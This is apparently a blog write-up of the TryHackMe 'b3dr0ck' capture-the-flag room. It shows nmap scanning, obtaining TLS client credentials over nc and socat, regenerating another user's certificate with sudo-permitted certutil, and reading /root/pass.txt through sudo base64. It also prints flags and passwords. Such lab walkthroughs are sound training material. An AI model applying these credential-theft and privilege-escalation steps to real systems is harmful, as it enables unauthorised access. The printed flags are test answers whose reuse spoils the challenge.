b3dr0ck — THM WriteUp

Carlos Padilla

4 min readMay 20, 2024

Server trouble in Bedrock.

b3dr0ck

Server trouble in Bedrock.

tryhackme.com

Title: b3dr0ck | Difficulty: Easy | Questions: 4| Carlos Padilla

Fred Flintstone & Barney Rubble!

Barney is setting up the ABC webserver, and trying to use TLS certs to secure connections, but he’s having trouble. Here’s what we know…

He was able to establish nginx on port 80, redirecting to a custom TLS webserver on port 4040
There is a TCP socket listening with a simple service to help retrieve TLS credential files (client key & certificate)
There is another TCP (TLS) helper service listening for authorized connections using files obtained from the above service
Can you find all the Easter eggs?

What is the barney.txt flag?

I start the machine by performing a port scan with nmap:

└─$ sudo nmap -p- -sCV -vvv -T4 10.10.66.42 -oN nmap.txt

This is the result:

PORT      STATE SERVICE      REASON         VERSION
22/tcp    open  ssh          syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http         syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
4040/tcp  open  ssl/yo-main? syn-ack ttl 63
9009/tcp  open  pichat?      syn-ack ttl 63
54321/tcp open  ssl/unknown  syn-ack ttl 63

If we try to enter the web server on port 80, it will redirect us to an https server on port 4040 where we find:

When we connect through port 9009 via nc:

└─$ nc 10.10.66.42 9009

If we read well, it tells us that this service returns the certificate and a private key:

You use this service to recover your client certificate and private key

If we write key or certificate, will return:

In this way we obtain these two files. Now, we save the files and follow the instructions of the server:

socat stdio ssl:MACHINE_IP:54321,cert=<CERT_FILE>,key=<KEY_FILE>,verify=0

Typing help or passwd returns Barney’s username and password. With this password we will be able to log in by ssh later.

Welcome: 'Barney Rubble' is authorized.
b3dr0ck> help
Password hint: d1ad7c0a3805955a35eb260dab4180dd (user = 'Barney Rubble')
b3dr0ck> passwd
Password hint: d1ad7c0a3805955a35eb260dab4180dd (user = 'Barney Rubble')

In this way we obtain the barney flag.
Flag: THM{f05780f08f0eb1de65023069d0e4c90c}

What is fred’s password?

Using the command sudo -l we know that we can execute /usr/bin/certutil with the user sudo.

Looking for a bit of information, this app manages certificates:

Ubuntu Manpage: certutil - Manage keys and certificate in both NSS databases and other NSS tokens

The Certificate Database Tool, certutil, is a command-line utility that can create and modify certificate and key…

manpages.ubuntu.com

By listing them with their command we get this:

barney@b3dr0ck:~$ sudo -u root /usr/bin/certutil ls

Now, we will regenerate the certificate of the other user of the system (fred) to repeat the same process that we have done to obtain Barney’s password.

barney@b3dr0ck:~$ sudo -u root /usr/bin/certutil -a fred.csr.pem

Save the files and repeat the same process with port 54321.

Password: YabbaDabbaD0000!

What is the fred.txt flag?

Once we have the password we can start using ssh or changing the user to the user fred:

Flag: THM{08da34e619da839b154521da7323559d}

What is the root.txt flag?

This is the output of sudo -l

fred@b3dr0ck:~$ sudo -l
Matching Defaults entries for fred on b3dr0ck:
    insults, env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User fred may run the following commands on b3dr0ck:
    (ALL : ALL) NOPASSWD: /usr/bin/base32 /root/pass.txt
    (ALL : ALL) NOPASSWD: /usr/bin/base64 /root/pass.txt

fred@b3dr0ck:~$ sudo -u root /usr/bin/base64 /root/pass.txt
TEZLRUM1MlpLUkNYU1dLWElaVlU0M0tKR05NWFVSSlNMRldWUzUyT1BKQVhVVExOSkpWVTJSQ1dO
QkdYVVJUTEpaS0ZTU1lLCg==

We will go to cibercheff and using base64 decoder and magic we will get a hash in md5 with the root password